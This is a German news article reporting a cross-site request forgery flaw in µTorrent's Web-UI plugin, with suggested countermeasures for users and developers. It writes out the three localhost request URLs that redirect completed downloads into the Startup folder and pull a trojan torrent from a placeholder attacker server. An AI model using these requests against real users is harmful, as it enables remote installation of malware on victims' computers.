Rechnerübernahme durch Cross-Site-Request-Forgery
Billy Rios berichtet von einem Angriff mittels Cross-Site-Request-Forgery (CSRF), bei dem Angreifer mit einer manipulierten Webseite oder E-Mail die komplette Kontrolle über ein System übernehmen können.
Der Sicherheitsexperte Billy Rios berichtet von einer Schwachstelle, die Rob Carter in der Weboberfläche Web-UI für den beliebten Bittorrent-Client µTorrent aufgedeckt hat. Angreifer können dadurch mit einer manipulierten E-Mail oder Webseite die vollständige Kontrolle über ein System übernehmen. Der Fehler beruht auf einer Cross-Site-Request-Forgery (CSRF), wobei Webseiten mit präparierten Links etwa als JavaScript oder in <IMG>-Tags auf andere Webseiten zugreifen und dort mit dem Zugang des angegriffenen Benutzers beispielsweise Konfigurationsänderungen vornehmen.
Bislang wurden etwa CSRF-Angriffe bekannt, durch die etwa die Routerkonfiguration von Nutzern so verändert wurde, dass die Router zur Namensauflösung auf manipulierte Server im Netz verwiesen. Die von Carter gefundene Lücke erlaubt jedoch, etwa einen Trojaner direkt auf dem Rechner eines Opfers zu installieren.
Carters Angriff erfolgt in mehreren Stufen. Ein erster Link verändert die Konfiguration von µTorrent so, dass es fertiggestellte Downloads in ein anderes Verzeichnis verschiebt:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1.
Anschließend verändert er den Pfad, an den die fertiggestellten Downloads verschoben werden:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=
C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup.
Das verschiebt heruntergeladene Dateien in den Autostart-Ordner aller Anwender auf dem System. Ein Angreifer kann jetzt mit einem dritten Link den Download eines Trojaners starten, der nach einem Neustart des Rechners nach der Anmeldung eines Benutzers ausgeführt wird:
http://localhost:14774/gui/?action=add-url&s=http://boeser.server.domain/trojaner.torrent.
Als Schutzmaßnahme gegen einen solchen CSRF-Angriff könnte die Anforderung des Passworts vor jeder Konfigurationsänderung dienen oder das Nutzen einer Session-ID – die darf allerdings nicht in einem Cookie landen, da sie sonst nutzlos wäre.
Nutzer von µTorrents Web-UI-Plug-in sollten zumindest den Standardport ändern, auf dem die Oberfläche im Netz lauscht. Sie sollten sich zudem nach jeder Änderung von der Oberfläche umgehend abmelden. Am sichersten ist jedoch der vollständige Verzicht auf das Plug-in, bis die Entwickler eine fehlerbereinigte Version zum Download bereitstellen.
Siehe dazu auch:
- CSRF pwns your box?!?!, Blog-Eintrag von Billy Rios
